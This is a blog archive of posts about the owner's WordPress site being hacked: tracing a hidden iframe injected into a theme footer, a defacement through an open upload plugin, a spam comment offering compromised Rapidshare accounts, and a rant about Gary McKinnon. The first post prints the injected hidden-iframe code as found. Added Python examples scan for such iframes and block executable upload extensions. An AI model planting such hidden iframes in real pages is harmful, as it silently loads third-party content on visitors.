Tag Archive: Cracker

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

# Apache access rule added to .htaccess: refuse GET and POST requests
# arriving from the 112.0.0.0/8 range (the block containing the
# 112.78.15.230 server that holds tructuyenso.vn) and allow everyone else.
<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site, as the progress indicator wouldn’t stop.

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com (now Microsoft!) that shows the various network connections being made to and from one’s PC.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area) fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230.  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above.

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, MySQL database and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was, and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine.  To be sure, I downloaded a fresh copy of the theme and checked its footer file against mine – it’s clean!  I then uploaded the whole clean Suffusion theme in its entirety, just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.
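The fix that finally worked was reading the page source and tracing the hidden iframe back to footer.php. It is worth noting why the .htaccess rule further up could not have stopped it: that rule only filters requests reaching the server from 112.0.0.0/8, whereas the injected iframe is fetched by each visitor’s own browser, so the page itself had to be cleaned. As an added example (not the post’s own code, nor anything from the Suffusion theme), here is a small Python scanner that walks a theme directory and flags iframes that are zero-sized or hidden, or whose src points outside a list of trusted hosts. The footer sample and the host name injected.example are constructed for the demonstration.

```python
import os
import re
import html
from urllib.parse import urlparse

# Constructed sample of a theme footer.php with a hidden iframe appended just
# before </body>, mirroring the injection described in the post. The host
# "injected.example" is a placeholder, not a real domain.
SAMPLE_FOOTER = """<div id="footer">
  <p>&copy; strangelyperfect.tv</p>
  <iframe src="https://www.youtube.com/embed/clip" width="560" height="315"></iframe>
</div>
<a href="http://injected.example" title="spam link"> spam link</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0"
 nosize scrolling="no" src="http://injected.example/"></iframe>
</body>
</html>
"""

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")


def parse_attrs(attr_text):
    """Turn the attribute text of a tag into a dict keyed by lower-cased name."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(g for g in m.group(2, 3, 4) if g is not None)
        attrs[m.group(1).lower()] = html.unescape(value)
    return attrs


def is_hidden(attrs):
    """True for zero-size frames or inline styles that hide the element."""
    for key in ("width", "height"):
        size = attrs.get(key, "").strip().lower()
        if size in ("0", "0px", "0%"):
            return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def is_trusted(host, trusted_hosts):
    """A host is trusted if it equals, or is a subdomain of, a trusted name."""
    host = host.lower()
    return any(host == t or host.endswith("." + t) for t in trusted_hosts)


def find_suspicious_iframes(page_html, trusted_hosts):
    """Return one finding per iframe that is hidden or points at an untrusted host."""
    findings = []
    for m in IFRAME_RE.finditer(page_html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        reasons = []
        if is_hidden(attrs):
            reasons.append("hidden")
        if host and not is_trusted(host, trusted_hosts):
            reasons.append("untrusted-host")
        if reasons:
            findings.append({"src": src, "host": host, "reasons": reasons, "offset": m.start()})
    return findings


def scan_theme(root, trusted_hosts, extensions=(".php", ".html", ".htm")):
    """Walk a theme directory and report suspicious iframes per file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_suspicious_iframes(fh.read(), trusted_hosts)
                if hits:
                    report[path] = hits
    return report


if __name__ == "__main__":
    # Run against the constructed footer; the YouTube embed is visible and
    # trusted, so only the zero-size frame pointing at injected.example is reported.
    for hit in find_suspicious_iframes(SAMPLE_FOOTER, {"strangelyperfect.tv", "youtube.com"}):
        print(hit)
```

Point scan_theme at the theme folder (or the whole wp-content directory) and compare the report against a fresh copy of the same theme; a legitimate embed shows up in both, an injection only in the live copy.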

A recheck on Sucuri shows my website to be okay now.  See screendump below.   I’ll be using Sucuri a lot more!

Sucuri Site Check

Turkish Hacker-Crackers, perhaps?

A Cracking Week Off?

I had a week’s holiday of sorts last week.  On returning I found that this website had been cracked. (I already had intimations that something was wrong because of site stat failures and an email from @Justin Asking, sometime commenter to this website and others).  Anyway, so it was.  Unfortunately, I didn’t have good web access so was unable to correct things properly.

The main screen, viewable on zone-h here, was replaced by this,

Site Hack Aug 2011

A neat little JavaScript mouse trailer was part of the package!

The cause was my own – a wide-open directory made so as part of an image upload plugin for my WordPress installation.  This plugin makes it easy and neat for any commenter to add material to the website……unfortunately for me, it allowed any file, with active content or not, to be uploaded.

Needless to say, the plugin is now disabled and the directory is locked down to the specific  file types that I’ll accept.  No more active content allowed there matey!

Unwanted Extras

Once the nasty files were uploaded, the internal site privileges allowed the install of a swathe of .htm files to the site root and uploads folder.  These had various names like f.htm, g.htm etc.  Index.htm was the file on show.

Alongside these, apart from files needed to run the previously mentioned JavaScript, were another swathe of .phtml files, such as joker.phtml, which are actually PHP code masquerading as HTML.  A couple of plain text files had also been uploaded.  These had lists of files, sites and persons.
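The fix described above (lock the upload directory down to specific file types, no active content) and the file names listed in this section make a good test set for an upload check. As an added example, not code from the post or from any WordPress plugin, here is a Python allow-list that accepts image uploads only: it rejects path components, dotfiles such as .htaccess, any dotted segment that a web server might execute or render (so joker.phtml, f.htm and a double-extension name like shell.php.jpg all fail), and then verifies that the file’s leading bytes match the claimed image type, so a script renamed to .jpg is still refused. The allowed and active extension sets are assumptions chosen for this example.

```python
import os
import re

# File types a comment-upload directory should accept: images only (assumed set).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Extensions a web server may execute or render as active content (assumed set).
# Every dotted segment of a name is checked, so "shell.php.jpg" is caught too:
# Apache's AddHandler matches any extension in the name, not only the last one.
ACTIVE_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht",
    "htm", "html", "shtml", "js", "cgi", "pl", "py", "sh", "htaccess",
}

# Leading bytes of the accepted image types, so the content is checked as well
# as the name.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def check_upload_name(name):
    """Return (ok, reason) for a proposed upload file name."""
    if not name or name != os.path.basename(name) or "\\" in name or "/" in name:
        return False, "path component in name"
    if name.startswith("."):
        return False, "hidden or dotfile name (e.g. .htaccess)"
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension"
    for seg in parts[1:]:
        if seg in ACTIVE_EXTENSIONS:
            return False, f"active extension '{seg}' in name"
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return False, f"extension '{parts[-1]}' not in allow-list"
    if not re.fullmatch(r"[a-z0-9_-]+(\.[a-z0-9]+)+", name.lower()):
        return False, "unsafe characters in name"
    return True, "ok"


def check_upload_content(name, data):
    """Return (ok, reason): the bytes must start with the magic of the claimed type."""
    ok, reason = check_upload_name(name)
    if not ok:
        return ok, reason
    ext = name.lower().rsplit(".", 1)[-1]
    if not any(data.startswith(magic) for magic in IMAGE_MAGIC[ext]):
        return False, f"content does not look like {ext}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample names: the post's dropped files plus a few classic tricks.
    for sample in ("photo.jpg", "joker.phtml", "f.htm", "shell.php.jpg",
                   ".htaccess", "../wp-config.php", "my photo.jpg"):
        print(f"{sample!r}: {check_upload_name(sample)}")
    # Constructed content: a valid PNG header versus PHP source renamed to .jpg.
    print(check_upload_content("pic.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8))
    print(check_upload_content("pic.jpg", b"<?php echo 1; ?>"))
```

Name and content checks are both needed: the name check stops the server from ever treating the upload as a script, and the content check catches a file whose name is innocent but whose bytes are not. Serving the upload directory with script execution switched off is the third layer, and the one that holds even if the plugin is wrong again.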

All .htaccess files were okay, as were the WordPress installation files.  To be sure, I redid the WordPress install from scratch with freshly downloaded files.

Finale

All told, about fifty files were dumped on my website.  I’ve hopefully removed the lot and have them downloaded for analysis at a later date.  The screen content and internal code all point to Turkish or S.E. Asian (Vietnam or Indonesia) Muslim crackers (I refuse to use the hacker term except to clarify the cracking of security by its now-common usage).  Saying this, the code points to several authors who used freely downloadable files from cracking websites and then proudly expected a pat on the back for their extreme skill at doing a download… like… der… so the culprits could have come from anywhere.

Fifth columnists and agent-provocateurs are nothing new.

Interestingly, being cracked puts me in the same company as at least 186 well-known multinational businesses, such as Acer, Vodafone, BetFair, The Daily Telegraph, The Register, Spam.Org, Victoria Beckham and Destiny’s Child.

Even System of a Down dot com, was down!

Zone-h’s full list is here.  The Register reports it here, The Guardian here.

The Guardian interview with the crackers notes that the culprits had been planning the attack for some time, which obviously includes the time when my site was compromised.  I don’t know if my website was actually used as part of the above DNS server attack, but it’s usual for an attack like a DDoS to use several vectors and simultaneous attack points in order to force a server to fail and dump code.  This dump then reveals passwords and the like for later use.

Addendum

WordPress.Org’s forum has a posting about this crack from last week.  A Google search in the comment by RedNeckTexan shows the attack on this website to be far from unique!   The links I’ve followed go right to the heart of the crack and the people doing the cracking.

This is the Google Search on the “Easy Comment Uploader” plugin.  Like me, RedNeckTexan has pulled the plugin for now, which can be found in the WordPress repository here.

Weird Pings from a Sub-Domain

Strangely post on May 22nd, 2009
Posted in Technology

I’ve Been Pinged from My Own Unknown Sub-Domains!

One day I’ll figure out how the HTTP protocol and the rest work.

Last night I had some hits looking for a feed and the domain root from

Now this doesn’t exist!  So I got pinged by myself from something that doesn’t exist!

In fact I haven’t any sub-domains on this domain and there are no /board/ folders….  So I thought I’d check the records.  After all, the records show that I’m referring to myself!!!

Well they say the referral was instigated by a person that’s already commented much good stuff to this website, @Not Kevin.  He was at his standard ISP address in bonny Scotland.

What’s it Mean?

Well I don’t know, actually!  It could be that Not Kevin was using a reader or plugin for Firefox that has certain default settings that it scans through.  He could actually be on the World’s Most Wanted List of Hackers and Crackers, but I doubt it!  All I know is that it’s weird.

What Else is Weird?

Well weird is weird.  It’s another word that breaks the “I before E except after C” rule.  More like a guideline really – like MP expenses and the Pirate Code.

Now that’s weird.

Rapidshare WordPress Comment Spam

I got an unusual (for me) comment spam this morning at 01:58 from a Kuala Lumpur spammer.  His modus operandi is to trawl WordPress blogs looking for the word “RapidShare” and then dump a deliberately malformed warez-type URL to a zip file promising unlimited super-fast Rapidshare accounts that have been compromised.

I had such a posting quite a while ago here, view-of-local-network-from-rapidshare-a-black-hole, so I’ll be letting the comment through because it’s got no active backlinks and such like.

RapidShare

It’s a file sharing website where users can share files of their own creation or where there isn’t a valid copyright. In the real world, of course, I guess about 99% of it is cracked software and copyright video and music. Some of it is my own and others under the Crawling Chaos moniker.  Bizarrely, you can actually pay a premium if you want better downloads of the ‘free’ stuff in the “premium” service.  But that’s the point, isn’t it?  ;-)

Comment Spammer

And this is where the spammer comes in. The comment and malformed URL are these:

Hey guy's! Check it out.HURRY!
JUST DONT CHANGE THE PASSWORD COZ EVERYBODY ALSO USING IT . Enjoyyyy.

h t t p://rapidshare.com/files/203145031/Rapidshare_Premium_Accounts_-_Latest_Issue.zip

Content

I checked the zip.  There’s a lot of Spanish and English in some text files as word docs in both old and new formats as well as plain text files.  There’s also an MP3 file.  In my sandbox they checked as clean!!  I haven’t gone any deeper into testing the passwords as Rapidshare, while being good in principle, is actually theft and deception in practice.

The spammer’s email checks out in a few on-line mobile phone sales on a Malaysian website. It’s [email protected] but it’s probably spoofed.  With so much secrecy and nefarious activity on the web, who’s to say?

I don’t see it as a benevolent gesture of a thief in a theft based culture.  I see it more as a tester for a bigger plan.  Maybe, send a few of these ‘tasters’ out for a bit before the true malevolence is delivered?  Maybe the dodgy content is in the particular RapidShare accounts that have been compromised or deliberately set up with this purpose in mind?

You’ve been warned!

Free The UFO One!

Gary McKinnon, the UFO spotter cum computer hacker is still not tried for his ‘offence’.  But the ice he’s treading is getting thinner and thinner.

Recently our nice CPS deemed that there wasn’t enough UK evidence to try him – but that the USA had plenty so we’ll send him there!

Wargames

His charge, which I mentioned earlier here, Gold’en Rant : Why Did The UK Government Fail To Back Gary McKinnon?, and which I referred to in this post, Gold’en Rant : Why Did The UK Government Fail To Back Gary McKinnon?, is that he cracked open lots of poorly defended USA military computers.  His defence is that he was only looking for hidden information on UFOs, which many in the USA believe to be true.

Funnily enough, even though there’s a potentially life-long sentence awaiting him and the USA has admitted recent torture and abduction of civilians (e.g. Guantanamo Bay etc), the UK has a one-way extradition treaty with the USA.  This means that nutter computer Yanks can’t be extradited here!  There are actually tens, if not hundreds of USA based spammers and trojan launchers who could fit that criteria … think of the damage and economic waste they’ve generated…   funny that, innit?

The Bourne Identity etc

Personally, after watching him in the two videos below, he just seems a bright guy.  I’m not even certain about the Asperger’s thing – I’m exactly like him.  His real crime seems to be upsetting the GW Bush PATRIOT mob and making their billions of high tech look like kindergarten bricks.  GW Bush etc seem to have been trapped into believing that the power of IT in their hands, as depicted in films like “The Bourne Identity” etc, is true.  The reality, as we’ve all seen on our British streets, is that the intelligence services are as clueless as everyone else and will shoot a defenceless man on a tube train eight times in the head with dum-dum bullets in a blind panic.

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me